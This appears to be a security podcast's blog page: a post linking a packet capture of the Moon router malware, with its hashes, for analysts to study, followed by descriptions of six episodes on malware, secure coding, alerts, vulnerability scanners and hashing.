Last night on Twitter, someone had posted a pcap file of the MOON self-replicating malware running through many newer brands of Linksys router. So I thought I would post the pcap file here for all you packet weasels to enjoy.
Also, we will be posting our Part 2 of Michael Gough, an Austin-based Malware researcher, who enjoys getting an infection for a living.
moon.pcap: http://bit.ly/1eRpvaw (redirects to google drive)
MD5:8138d3c4eb132269135ae174f703d0fb
SHA256:ed65982d9c6e7c4a1a95220af6817e4fa15662ddfd6647c55858dbc79d2bfe80
Published on: February 19, 2014
Episode 6 - Malware Interview Michael Gough (Part 1)
This week, we are excited to have Michael Gough, a local malware researcher from Mi2Security on with us to talk about types of malware, infection vectors, some of the tools that users have available to them to detect and prevent malware. We also discuss who gains from malware infections, the 'bad guys', and even the AV/Malware detection companies. We also talk about how his software program "Sniper Forensic Toolkit" would detect malware.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 5 - Interview with Frank Kim
This week, we interviewed Frank Kim, an instructor from SANS, talks about developers methods, the challenges of getting developers to code securely, and the efforts to create a culture of secure coding.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 4: Origin stories, and talking about reconnaissance
All superheroes have an origin story, Brian and I are not super, but we have a great origin story. This week's podcast is about how we made it into the Infosec industry, and we also discuss the value of research from an OS point of view. We also talk about mentoring and assistance for those looking to get into the InfoSec world.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 3 - Alerts, Events, and a bit of incident response
In this issue, we talked about upcoming podcasts with Michael Gough from MI2 Security discussing malware, and this week we get into everything about alerts, why they are important, types of alerts, levels that can occur, and even a bit of incident response in handling alerts.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 2 -- Feeling Vulnerable? - Vulnerability scanners - Go Exploit Yourself
This week Bryan and Brian talk about the uses, and sometimes pitfalls, of vulnerability scanners.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 1: Kicking some Hash!
In this inaugural episode, Bryan and Brian discuss the history of hashes, how hashes are used and how to make them more secure.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/